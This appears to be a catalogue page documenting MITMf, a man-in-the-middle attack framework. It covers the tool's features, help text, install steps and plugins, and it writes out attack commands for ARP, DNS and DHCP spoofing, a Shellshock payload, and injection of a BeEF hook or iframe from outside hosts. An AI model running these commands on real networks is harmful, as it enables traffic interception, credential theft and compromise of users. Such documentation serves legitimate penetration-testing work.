You are here: Home » Sniffing & Spoofing » MITMf

MITMf

MITMf Description

MITMf – Framework for Man-In-The-Middle attacks.

Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

Features

  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
    log.info('Got an ICMP packet!')
    packet.dst = '192.168.1.0'
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else 😉

Note: you can modify filters on-the-fly without restarting MITMf!

Homepage: https://github.com/byt3bl33d3r/MITMf

Author: byt3bl33d3r

License: GPLv3

MITMf Help

usage: mitmf.py -i interface [mitmf options] [plugin name] [plugin options]
optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit

MITMf:
  Options for MITMf

  --log-level {debug,info}
                        Specify a log level [default: info]
  -i INTERFACE          Interface to listen on
  -c CONFIG_FILE        Specify config file to use
  -p, --preserve-cache  Don't kill client/server caching
  -r READ_PCAP, --read-pcap READ_PCAP
                        Parse specified pcap for credentials and exit
  -l PORT               Port to listen on (default 10000)
  -f, --favicon         Substitute a lock favicon on secure requests.
  -k, --killsessions    Kill sessions in progress.
  -F FILTER, --filter FILTER
                        Filter to apply to incoming traffic

Upsidedownternet:
  Flips images 180 degrees

  --upsidedownternet    Load plugin 'Upsidedownternet'

AppCachePoison:
  Performs App Cache Poisoning attacks

  --appoison            Load plugin 'AppCachePoison'

Inject:
  Inject arbitrary content into HTML content

  --inject              Load plugin 'Inject'
  --js-url JS_URL       URL of the JS to inject
  --js-payload JS_PAYLOAD
                        JS string to inject
  --js-file JS_FILE     File containing JS to inject
  --html-url HTML_URL   URL of the HTML to inject
  --html-payload HTML_PAYLOAD
                        HTML string to inject
  --html-file HTML_FILE
                        File containing HTML to inject
  --per-domain          Inject once per domain per client.
  --rate-limit RATE_LIMIT
                        Inject once every RATE_LIMIT seconds per client.
  --count-limit COUNT_LIMIT
                        Inject only COUNT_LIMIT times per client.
  --white-ips IP        Inject content ONLY for these ips (comma seperated)
  --black-ips IP        DO NOT inject content for these ips (comma seperated)
  --white-domains DOMAINS
                        Inject content ONLY for these domains (comma seperated)
  --black-domains DOMAINS
                        DO NOT inject content for these domains (comma seperated)

BrowserProfiler:
  Attempts to enumerate all browser plugins of connected clients

  --browserprofiler     Load plugin 'BrowserProfiler'

HTA Drive-By:
  Performs HTA drive-by attacks on clients

  --hta                 Load plugin 'HTA Drive-By'
  --text TEXT           Text to display on notification bar
  --hta-app HTA_APP     Path to HTA application [defaults to config/hta_driveby/flash_setup.hta]

SSLstrip+:
  Enables SSLstrip+ for partial HSTS bypass

  --hsts                Load plugin 'SSLstrip+'

SMBTrap:
  Exploits the SMBTrap vulnerability on connected clients

  --smbtrap             Load plugin 'SMBTrap'

SMBAuth:
  Evoke SMB challenge-response auth attempts

  --smbauth             Load plugin 'SMBAuth'

JSKeylogger:
  Injects a javascript keylogger into clients webpages

  --jskeylogger         Load plugin 'JSKeylogger'

BrowserSniper:
  Performs drive-by attacks on clients with out-of-date browser plugins

  --browsersniper       Load plugin 'BrowserSniper'

FilePwn:
  Backdoor executables being sent over http using bdfactory

  --filepwn             Load plugin 'FilePwn'

Replace:
  Replace arbitrary content in HTML content

  --replace             Load plugin 'Replace'

ScreenShotter:
  Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  --screen              Load plugin 'ScreenShotter'
  --interval SECONDS    Interval at which screenshots will be taken (default 10 seconds)

ImageRandomizer:
  Replaces images with a random one from a specified directory

  --imgrand             Load plugin 'ImageRandomizer'
  --img-dir DIRECTORY   Directory with images

Ferret-NG:
  Captures cookies and starts a proxy that will feed them to connected clients

  --ferretng            Load plugin 'Ferret-NG'
  --port PORT           Port to start Ferret-NG proxy on (default 10010)
  --load-cookies FILE   Load cookies from a log file

Responder:
  Poison LLMNR, NBT-NS and MDNS requests

  --responder           Load plugin 'Responder'
  --analyze             Allows you to see NBT-NS, BROWSER, LLMNR requests without poisoning
  --wredir              Enables answers for netbios wredir suffix queries
  --nbtns               Enables answers for netbios domain suffix queries
  --fingerprint         Fingerprint hosts that issued an NBT-NS or LLMNR query
  --lm                  Force LM hashing downgrade for Windows XP/2003 and earlier
  --wpad                Start the WPAD rogue proxy server
  --forcewpadauth       Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)
  --basic               Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned

Spoof:
  Redirect/Modify traffic using ICMP, ARP, DHCP or DNS

  --spoof               Load plugin 'Spoof'
  --arp                 Redirect traffic using ARP spoofing
  --icmp                Redirect traffic using ICMP redirects
  --dhcp                Redirect traffic using DHCP offers
  --dns                 Proxy/Modify DNS queries
  --netmask NETMASK     The netmask of the network
  --shellshock PAYLOAD  Trigger the Shellshock vuln when spoofing DHCP, and execute specified command
  --gateway GATEWAY     Specify the gateway IP
  --gatewaymac GATEWAYMAC
                        Specify the gateway MAC [will auto resolve if ommited]
  --targets TARGETS     Specify host/s to poison [if ommited will default to subnet]
  --ignore IGNORE       Specify host/s not to poison
  --arpmode {rep,req}    ARP Spoofing mode: replies (rep) or requests (req) [default: rep]

MITMf Usage Example

The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run 

python mitmf.py --help

How to install MITMf

Installation on Kali Linux

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libxml2-dev libxslt1-dev
pip install virtualenvwrapper
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
pip install requests[security]
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
python mitmf.py --help

After reboot go to the directory with the installed program:

cd MITMf/

And:

source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
python mitmf.py --help

Installation on BlackArch

pacman -S mitmf python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone
sudo pip install virtualenvwrapper
source /usr/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
pip install requests[security]
cd /usr/share/mitmf/
pip install -r requirements.txt
cd
sudo python /usr/share/mitmf/mitmf.py --help

Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:

source /usr/bin/virtualenvwrapper.sh

Installation on Linux (Debian, Mint, Ubuntu)

sudo apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev python-pip git libxml2-dev libxslt1-dev libffi-dev libjpeg-dev libffi-dev libssl-dev libnfnetlink* libnetfilter-queue-dev
sudo pip install capstone
sudo pip install virtualenvwrapper
sudo -s
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
sudo pip install requests[security]
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
python mitmf.py --help

After reboot go to the directory with the installed program:

cd MITMf/

And:

sudo -s
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
python mitmf.py --help

MITMf Screenshots

The program is a command-line utility.

MITMf Tutorials

Coming soon…

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the 'SMB Trap' vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transperently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client's webpages
  • Replace : Replace arbitrary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees

Related tools

Also recommended: